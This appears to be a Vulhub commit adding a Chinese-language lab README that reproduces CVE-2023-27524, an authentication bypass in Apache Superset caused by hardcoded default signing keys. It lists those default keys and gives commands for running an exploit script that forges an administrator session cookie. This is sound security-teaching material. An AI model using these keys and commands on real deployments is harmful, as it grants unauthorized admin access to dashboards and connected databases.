first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled

This commit is contained in:
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions

View File

@@ -0,0 +1,50 @@
# Apache Superset 硬编码JWT密钥导致认证绕过漏洞CVE-2023-27524
Apache Superset是一个开源的数据探索和可视化平台设计为可视化、直观和交互式的数据分析工具。
Apache Superset存在一个硬编码JWT密钥漏洞CVE-2023-27524。该应用程序默认配置了一个预设的`SECRET_KEY`用于签名会话Cookie。当管理员未更改这个默认密钥时攻击者可以伪造有效的会话Cookie并以任意用户包括管理员身份进行认证。这允许未授权访问Superset仪表盘、连接的数据库并可能导致远程代码执行。
当与 [CVE-2023-37941](../CVE-2023-37941/README.md) 结合使用时未经身份验证的攻击者可以先绕过身份验证然后利用反序列化漏洞执行任意代码。不过本文档只展示CVE-2023-27524的利用。
参考链接:
- <https://www.horizon3.ai/attack-research/disclosures/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/>
- <https://github.com/horizon3ai/CVE-2023-27524>
## 环境搭建
执行以下命令启动Apache Superset 2.0.1服务器:
```
docker compose up -d
```
服务启动后,可以通过`http://your-ip:8088`访问Superset。默认登录凭据为admin/vulhub。
## 漏洞复现
这个漏洞存在的原因是Superset使用以下硬编码的`SECRET_KEY`作为密钥来签名Cookie
- `\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h` (版本 < 1.4.1)
- `CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET` (版本 >= 1.4.1)
- `thisISaSECRET_1234`
- `YOUR_OWN_RANDOM_GENERATED_SECRET_KEY`
- `TEST_NON_DEV_SECRET`
使用[CVE-2023-27524.py](CVE-2023-27524.py)伪造管理员用户id为1会话Cookie
```bash
# Install dependencies
pip install -r requirements.txt
# Forge an administrative session (whose user_id is 1) cookie
python CVE-2023-27524.py --url http://your-ip:8088 --id 1 --validate
```
该脚本尝试使用已知的默认密钥破解会话Cookie。如果成功它将伪造一个新的会话Cookie其中user_id=1通常是管理员用户并验证登录。
![](1.png)
将这个伪造的JWT令牌添加到Cookie值中`Cookie: session=eyJ...`即可访问Superset的后端API
![](2.png)